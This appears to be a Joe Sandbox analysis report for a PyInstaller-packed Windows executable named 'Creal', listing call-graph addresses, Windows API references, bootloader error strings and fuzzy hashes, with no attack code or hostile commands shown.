7ff6d9254f08 _get_daylight 11 API calls 18269->18270 18366 7ff6d9246375 18365->18366 18367 7ff6d9241c80 49 API calls 18366->18367 18368 7ff6d92463b1 18367->18368 18369 7ff6d92463dd 18368->18369 18370 7ff6d92463ba 18368->18370 18372 7ff6d9244630 49 API calls 18369->18372 18371 7ff6d9242710 54 API calls 18370->18371 18389 7ff6d92463d3 18371->18389 18373 7ff6d92463f5 18372->18373 18374 7ff6d9246413 18373->18374 18375 7ff6d9242710 54 API calls 18373->18375 18376 7ff6d9244560 10 API calls 18374->18376 18375->18374 18378 7ff6d924641d 18376->18378 18377 7ff6d924c550 _log10_special 8 API calls 18379 7ff6d924336e 18377->18379 18380 7ff6d924642b 18378->18380 18381 7ff6d9248e80 3 API calls 18378->18381 18379->16420 18396 7ff6d9246500 18379->18396 18382 7ff6d9244630 49 API calls 18380->18382 18381->18380 18389->18377 18545 7ff6d9245400 18396->18545 18655 7ff6d925b150 __CxxCallCatchBlock 45 API calls 18654->18655 18657 7ff6d925a3e1 18655->18657 18659 7ff6d925a504 18657->18659 18668 7ff6d9263650 18659->18668 18694 7ff6d9263608 18668->18694 18699 
7ff6d92602d8 EnterCriticalSection 18694->18699 18757 7ff6d9255628 18758 7ff6d9255642 18757->18758 18759 7ff6d925565f 18757->18759 18760 7ff6d9254ee8 _fread_nolock 11 API calls 18758->18760 18759->18758 18761 7ff6d9255672 CreateFileW 18759->18761 18762 7ff6d9255647 18760->18762 18763 7ff6d92556dc 18761->18763 18764 7ff6d92556a6 18761->18764 18765 7ff6d9254f08 _get_daylight 11 API calls 18762->18765 18808 7ff6d9255c04 18763->18808 18782 7ff6d925577c GetFileType 18764->18782 18769 7ff6d925564f 18765->18769 18773 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18769->18773 18771 7ff6d92556e5 18776 7ff6d9254e7c _fread_nolock 11 API calls 18771->18776 18772 7ff6d9255710 18829 7ff6d92559c4 18772->18829 18778 7ff6d925565a 18773->18778 18774 7ff6d92556bb CloseHandle 18774->18778 18775 7ff6d92556d1 CloseHandle 18775->18778 18781 7ff6d92556ef 18776->18781 18781->18778 18783 7ff6d92557ca 18782->18783 18784 7ff6d9255887 18782->18784 18787 7ff6d92557f6 GetFileInformationByHandle 18783->18787 18792 7ff6d9255b00 21 API calls 18783->18792 18785 7ff6d925588f 18784->18785 18786 7ff6d92558b1 18784->18786 18788 7ff6d92558a2 GetLastError 18785->18788 18789 7ff6d9255893 18785->18789 18791 7ff6d92558d4 PeekNamedPipe 18786->18791 18806 7ff6d9255872 18786->18806 18787->18788 18790 7ff6d925581f 18787->18790 18795 7ff6d9254e7c _fread_nolock 11 API calls 18788->18795 18793 7ff6d9254f08 _get_daylight 11 API calls 18789->18793 18794 7ff6d92559c4 51 API calls 18790->18794 18791->18806 18796 7ff6d92557e4 18792->18796 18793->18806 18797 7ff6d925582a 18794->18797 18795->18806 18796->18787 18796->18806 18846 7ff6d9255924 18797->18846 18798 7ff6d924c550 _log10_special 8 API calls 18800 7ff6d92556b4 18798->18800 18800->18774 18800->18775 18802 7ff6d9255924 10 API calls 18803 7ff6d9255849 18802->18803 18804 7ff6d9255924 10 API calls 18803->18804 18805 7ff6d925585a 18804->18805 18805->18806 18807 7ff6d9254f08 _get_daylight 11 API calls 18805->18807 18806->18798 18807->18806 18809 7ff6d9255c3a 
18808->18809 18810 7ff6d9254f08 _get_daylight 11 API calls 18809->18810 18828 7ff6d9255cd2 __std_exception_copy 18809->18828 18812 7ff6d9255c4c 18810->18812 18811 7ff6d924c550 _log10_special 8 API calls 18813 7ff6d92556e1 18811->18813 18814 7ff6d9254f08 _get_daylight 11 API calls 18812->18814 18813->18771 18813->18772 18815 7ff6d9255c54 18814->18815 18816 7ff6d9257e08 45 API calls 18815->18816 18817 7ff6d9255c69 18816->18817 18818 7ff6d9255c7b 18817->18818 18819 7ff6d9255c71 18817->18819 18820 7ff6d9254f08 _get_daylight 11 API calls 18818->18820 18821 7ff6d9254f08 _get_daylight 11 API calls 18819->18821 18822 7ff6d9255c80 18820->18822 18825 7ff6d9255c76 18821->18825 18823 7ff6d9254f08 _get_daylight 11 API calls 18822->18823 18822->18828 18824 7ff6d9255c8a 18823->18824 18826 7ff6d9257e08 45 API calls 18824->18826 18827 7ff6d9255cc4 GetDriveTypeW 18825->18827 18825->18828 18826->18825 18827->18828 18828->18811 18831 7ff6d92559ec 18829->18831 18830 7ff6d925571d 18839 7ff6d9255b00 18830->18839 18831->18830 18853 7ff6d925f724 18831->18853 18833 7ff6d9255a80 18833->18830 18834 7ff6d925f724 51 API calls 18833->18834 18835 7ff6d9255a93 18834->18835 18835->18830 18836 7ff6d925f724 51 API calls 18835->18836 18837 7ff6d9255aa6 18836->18837 18837->18830 18838 7ff6d925f724 51 API calls 18837->18838 18838->18830 18840 7ff6d9255b1a 18839->18840 18841 7ff6d9255b51 18840->18841 18843 7ff6d9255b2a 18840->18843 18842 7ff6d925f5b8 21 API calls 18841->18842 18844 7ff6d9255b3a 18842->18844 18843->18844 18845 7ff6d9254e7c _fread_nolock 11 API calls 18843->18845 18844->18781 18845->18844 18847 7ff6d925594d FileTimeToSystemTime 18846->18847 18848 7ff6d9255940 18846->18848 18849 7ff6d9255961 SystemTimeToTzSpecificLocalTime 18847->18849 18850 7ff6d9255948 18847->18850 18848->18847 18848->18850 18849->18850 18851 7ff6d924c550 _log10_special 8 API calls 18850->18851 18852 7ff6d9255839 18851->18852 18852->18802 18854 7ff6d925f755 18853->18854 18855 7ff6d925f731 18853->18855 18857 7ff6d925f78f 
18854->18857 18860 7ff6d925f7ae 18854->18860 18855->18854 18856 7ff6d925f736 18855->18856 18858 7ff6d9254f08 _get_daylight 11 API calls 18856->18858 18859 7ff6d9254f08 _get_daylight 11 API calls 18857->18859 18861 7ff6d925f73b 18858->18861 18862 7ff6d925f794 18859->18862 18863 7ff6d9254f4c 45 API calls 18860->18863 18864 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18861->18864 18865 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18862->18865 18868 7ff6d925f7bb 18863->18868 18866 7ff6d925f746 18864->18866 18867 7ff6d925f79f 18865->18867 18866->18833 18867->18833 18868->18867 18869 7ff6d92604dc 51 API calls 18868->18869 18869->18868 19104 7ff6d92616b0 19115 7ff6d92673e4 19104->19115 19116 7ff6d92673f1 19115->19116 19117 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19116->19117 19118 7ff6d926740d 19116->19118 19117->19116 19119 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19118->19119 19120 7ff6d92616b9 19118->19120 19119->19118 19121 7ff6d92602d8 EnterCriticalSection 19120->19121 20237 7ff6d925c520 20248 7ff6d92602d8 EnterCriticalSection 20237->20248 18703 7ff6d925f98c 18704 7ff6d925fb7e 18703->18704 18706 7ff6d925f9ce _isindst 18703->18706 18705 7ff6d9254f08 _get_daylight 11 API calls 18704->18705 18723 7ff6d925fb6e 18705->18723 18706->18704 18709 7ff6d925fa4e _isindst 18706->18709 18707 7ff6d924c550 _log10_special 8 API calls 18708 7ff6d925fb99 18707->18708 18724 7ff6d9266194 18709->18724 18714 7ff6d925fbaa 18716 7ff6d925a900 _isindst 17 API calls 18714->18716 18717 7ff6d925fbbe 18716->18717 18721 7ff6d925faab 18721->18723 18748 7ff6d92661d8 18721->18748 18723->18707 18725 7ff6d92661a3 18724->18725 18726 7ff6d925fa6c 18724->18726 18755 7ff6d92602d8 EnterCriticalSection 18725->18755 18730 7ff6d9265598 18726->18730 18731 7ff6d92655a1 18730->18731 18735 7ff6d925fa81 18730->18735 18732 7ff6d9254f08 _get_daylight 11 API calls 18731->18732 18733 7ff6d92655a6 18732->18733 18734 7ff6d925a8e0 
_invalid_parameter_noinfo 37 API calls 18733->18734 18734->18735 18735->18714 18736 7ff6d92655c8 18735->18736 18737 7ff6d925fa92 18736->18737 18738 7ff6d92655d1 18736->18738 18737->18714 18742 7ff6d92655f8 18737->18742 18739 7ff6d9254f08 _get_daylight 11 API calls 18738->18739 18740 7ff6d92655d6 18739->18740 18741 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18740->18741 18741->18737 18743 7ff6d9265601 18742->18743 18745 7ff6d925faa3 18742->18745 18744 7ff6d9254f08 _get_daylight 11 API calls 18743->18744 18746 7ff6d9265606 18744->18746 18745->18714 18745->18721 18747 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 18746->18747 18747->18745 18756 7ff6d92602d8 EnterCriticalSection 18748->18756 20612 7ff6d9255410 20613 7ff6d925541b 20612->20613 20621 7ff6d925f2a4 20613->20621 20634 7ff6d92602d8 EnterCriticalSection 20621->20634 20635 7ff6d926adfe 20636 7ff6d926ae0d 20635->20636 20637 7ff6d926ae17 20635->20637 20639 7ff6d9260338 LeaveCriticalSection 20636->20639

Control-flow Graph (legend: Executed, Not Executed)
Memory Dump Source
• Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
Similarity
• API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
• String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
• API String ID: 3832162212-3165540532
• Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction ID: 3c67bba836a99225457eb9b277feedf950fe0e90b03fff68e5578b00ed1c1b9c
• Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
• Instruction Fuzzy Hash: 66D18232A29A8286FB109F74E9542AD3764FF98B58F400237DA5D83AA4DF3CD565CB40

Control-flow Graph (legend: Executed, Not Executed)
Strings
Memory Dump Source
• Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
• API String ID: 2776309574-4232158417
• Opcode ID: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
• Instruction ID: a6866806c9214bbae5c451787806f1a315c4708040ecb690f1ca90ee3d962c42
• Opcode Fuzzy Hash: 9de477ae995940a39e23314e20718922418974b9c8241bfba060ee61ec72f349
• Instruction Fuzzy Hash: 4E32AF21A2C68691FB19EF25DB543BD2661AF68780F444033DA5DC36D6DF2CE678CB40

Control-flow Graph
APIs
• _get_daylight.LIBCMT ref: 00007FF6D9265C45
  • Part of subcall function 00007FF6D9265598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92655AC
  • Part of subcall function 00007FF6D925A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A95E
  • Part of subcall function 00007FF6D925A948: GetLastError.KERNEL32(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A968
  • Part of subcall function 00007FF6D925A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6D925A8DF,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925A909
  • Part of subcall function 00007FF6D925A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6D925A8DF,?,?,?,?,?,00007FF6D925A7CA), ref: 00007FF6D925A92E
• _get_daylight.LIBCMT ref: 00007FF6D9265C34
  • Part of subcall function 00007FF6D92655F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D926560C
• _get_daylight.LIBCMT ref: 00007FF6D9265EAA
• _get_daylight.LIBCMT ref: 00007FF6D9265EBB
• _get_daylight.LIBCMT ref: 00007FF6D9265ECC
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D926610C), ref: 00007FF6D9265EF3
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID: Eastern Standard Time$Eastern Summer Time
• API String ID: 4070488512-239921721
• Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
• Instruction ID: dd93091ff2f17458dd622a58b75869cde8563797846a22ebf6205d689f5111da
• Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
• Instruction Fuzzy Hash: 18D1E122A2824246FB24AF65DA419BD6761FF84794F448037EA4DC7BDADF3CE461C780

Control-flow Graph
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction ID: cfc4742d87f74047e8abebaada8302a674a130fb90fb1d0c03b40b1d6c716977
• Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
• Instruction Fuzzy Hash: 22C1AE32B28A4185FB10CFA9D6906BD3761FB49B98F014226DE1E97BD4CF38E461C380

Control-flow Graph

APIs
• FindFirstFileW.KERNELBASE(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D924842B
• RemoveDirectoryW.KERNEL32(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D92484AE
• DeleteFileW.KERNELBASE(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D92484CD
• FindNextFileW.KERNELBASE(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D92484DB
• FindClose.KERNELBASE(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D92484EC
• RemoveDirectoryW.KERNELBASE(?,00007FF6D9248919,00007FF6D9243FA5), ref: 00007FF6D92484F5
Strings
Memory Dump Source
• Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                        • String ID: %s\*
                                                                                                                                                                                                                                                        • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                        • Opcode ID: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                                        • Instruction ID: 5e030df47e091e300b2cfc5277fafb3b971cf17dbf9ec107daf67d2f8dca4ab2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c12b01ff297979e1ecdf005a6213684df6049b407edb1b83f88227167b7eee2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F416421A3C58295FE209F64E6441BE63A0FBA9754F400233D55DC3AD4EF3CD559CB80

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265EAA
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D92655F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D926560C
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265EBB
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9265598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92655AC
                                                                                                                                                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF6D9265ECC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D92655C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D92655DC
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A95E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D925A948: GetLastError.KERNEL32(?,?,?,00007FF6D9262D22,?,?,?,00007FF6D9262D5F,?,?,00000000,00007FF6D9263225,?,?,?,00007FF6D9263157), ref: 00007FF6D925A968
                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D926610C), ref: 00007FF6D9265EF3
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                        • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                        • Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                                        • Instruction ID: 25a3a8369560544cbd8131752c635178d8c9d0a525411195b5f20d6c675ca29a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83517D32A2864286F724DF65EA815AD7761FB88784F404137EA4DC7B9ADF3CE521C780
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                                                                                                                                        • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                        • Instruction ID: 197d6703327ca0476f7df647dc377543a3ef7293deeb1d5b6b246ce2f7d6215e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3F0C826A2C74186FB60CF64B58876E7350BB98728F040336D96D52AD4DF3CD068CF00

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9247F90: _fread_nolock.LIBCMT ref: 00007FF6D924803A
                                                                                                                                                                                                                                                        • _fread_nolock.LIBCMT ref: 00007FF6D9241A1B
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6D9241B6A), ref: 00007FF6D924295E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                                                        • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                                                        • Opcode ID: 366ee5d3afceab38ba1fccf279b745a5e3150e0a5f226ca546ddb68d3ae287d0
                                                                                                                                                                                                                                                        • Instruction ID: 8a7be08f1889e787f5a7a87e71ba11c81de2b33eb88026d914b00db4016807a9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 366ee5d3afceab38ba1fccf279b745a5e3150e0a5f226ca546ddb68d3ae287d0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11819F71A2C68686FB60DF24DA412BD73A0AF68784F404433D98DC7B8ADE3CE565CB41

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                        • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                        • Opcode ID: 4ba9704c2667ef3387b8ad085b4ce1cd9035ff509126d6a3bfbf4b4a2ffdb3da
                                                                                                                                                                                                                                                        • Instruction ID: 6bd03d323095a1bb4be6c75c47db71f8cc9d53c1a6b641e574165910932f77e0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ba9704c2667ef3387b8ad085b4ce1cd9035ff509126d6a3bfbf4b4a2ffdb3da
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3518E21B2964392FA10AF51AA011BD73A0BF68794F444533EE4D87B9ADF3CE575CB80

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(?,?,00000000,00007FF6D9243CBB), ref: 00007FF6D9248704
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00007FF6D9243CBB), ref: 00007FF6D924870A
                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00007FF6D9243CBB), ref: 00007FF6D924874C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248830: GetEnvironmentVariableW.KERNEL32(00007FF6D924388E), ref: 00007FF6D9248867
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9248830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6D9248889
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9258238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9258251
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242810: MessageBoxW.USER32 ref: 00007FF6D92428EA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
• Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                                        • API String ID: 3563477958-1339014028
